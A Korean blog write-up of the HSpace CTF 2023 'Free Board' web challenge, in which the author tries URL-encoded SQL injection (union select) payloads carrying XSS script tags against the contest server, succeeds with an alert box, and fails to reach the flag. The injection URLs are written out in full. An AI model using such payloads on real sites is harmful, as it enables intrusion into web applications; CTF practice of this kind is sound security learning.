λ³Έλ¬Έ λ°”λ‘œκ°€κΈ°
βœ’οΈ Capture The Flag (CTF)

[HSpace CTF 2023] HSpace Free Board Write Up

by A Lim Han 2023. 9. 2.

🫐 HSpace Free Board Write Up

1.  λ¬Έμ œ 확인 ν›„ μ•ˆλ‚΄λœ 링크둜 접속

 

++  BlackBox λ¬Έμ œλž€?

 CTF (Capture The Flag) λŒ€νšŒμ—μ„œ "BlackBox 문제"λž€ μ°Έκ°€μžμ—κ²Œ 주어진 μ‹œμŠ€ν…œ, μ„œλΉ„μŠ€ λ˜λŠ” ν”„λ‘œκ·Έλž¨μ— λŒ€ν•œ λ‚΄λΆ€ λ™μž‘ λ˜λŠ” μ†ŒμŠ€ μ½”λ“œμ™€ 같은 ꡬ체적인 정보 없이 문제λ₯Ό ν•΄κ²°ν•΄μ•Ό ν•˜λŠ” μœ ν˜•μ˜ λ³΄μ•ˆ 문제λ₯Ό μ˜λ―Έν•œλ‹€.

2.  μž„μ˜μ˜ 계정을 μƒμ„±ν•˜μ—¬ νšŒμ› κ°€μž…  -->  νšŒμ› κ°€μž… ν›„ λ‹€μ‹œ 둜그인 창이 λœ¬λ‹€

3.  κ°€μž…ν•œ κ³„μ •μœΌλ‘œ 둜그인

4.  μ΅œν•˜λ‹¨μ˜ Post λ²„νŠΌμ„ 눌러 κΈ€μ“°κΈ°  -->  μ •μƒμ μœΌλ‘œ ν¬μŠ€νŒ…λœ 것을 확인

 

5.  URL μ‘°μž‘μ„ 톡해 κ²½κ³ μ°½ λ„μš°κΈ° μ‹œλ„  -->  μŠ€ν¬λ¦½νŠΈκ°€ μ„±κ³΅μ μœΌλ‘œ μ μš©λ¨μ„ 확인

# μž‘μ„±ν•œ URL
http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(1)%3C/script%3E%27,null

 

6.  이후 ν•˜λ‹¨κ³Ό 같은 μŠ€ν¬λ¦½νŠΈλ“€μ„ μ‹€ν–‰ν•˜μ—¬ 풀이λ₯Ό μ‹œλ„ν–ˆμ§€λ§Œ, Error μ°½ 문제λ₯Ό ν•΄κ²°ν•˜μ§€ λͺ»ν•¨

# μž‘μ„±ν•œ URL 및 슀크립트

1. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(./flag.php)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null

2. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3E%20function%20goToPage(flag)%20%7B%20window.location.href%20=%20url;%20%7D%20%3C/script%3E%27,null%27

3. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(200)%3C/script%3E%27,null

4. http://cat.moe:8004/read.php?id=200%20union%20select%20null,null,%27%3Cscript%3Ealert(??)%3C/script%3E%27,null

 

https://studyforall.tistory.com/60

 

[HSpace CTF] HSpace Free Board

문제 μ‚¬μ΄νŠΈμ— μ ‘μ†ν•˜λ©΄ 처음으둜 λ³΄μ΄λŠ” νŽ˜μ΄μ§€μ΄λ‹€. λ‘œκ·ΈμΈνΌμ΄λ‹€. Sign UP νŽ˜μ΄μ§€λ‘œ μ΄λ™ν•΄μ„œ νšŒμ›κ°€μž…μ„ ν•œλ‹€. νšŒμ›κ°€μž…ν•œ κ³„μ •μœΌλ‘œ λ‘œκ·ΈμΈν•œλ‹€. Login success! λΌλŠ” μ•Œλ¦Όμ°½μ΄ λœ¬λ‹€. κ²Œμ‹œνŒμ΄ 있

studyforall.tistory.com

 

'βœ’οΈ Capture The Flag (CTF)' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

[Patriot CTF 2023] Python XOR Write Up  (0) 2023.09.09
[DownUnder CTF 2023] 𝕏 Write Up  (0) 2023.09.04
[Hero CTF v5] Hyper Loop Write Up  (0) 2023.05.14
[PwnMe CTF 2023] Tree Viewer WriteUp  (0) 2023.05.07
[PwnMe CTF 2023] Just a XOR WriteUp  (0) 2023.05.06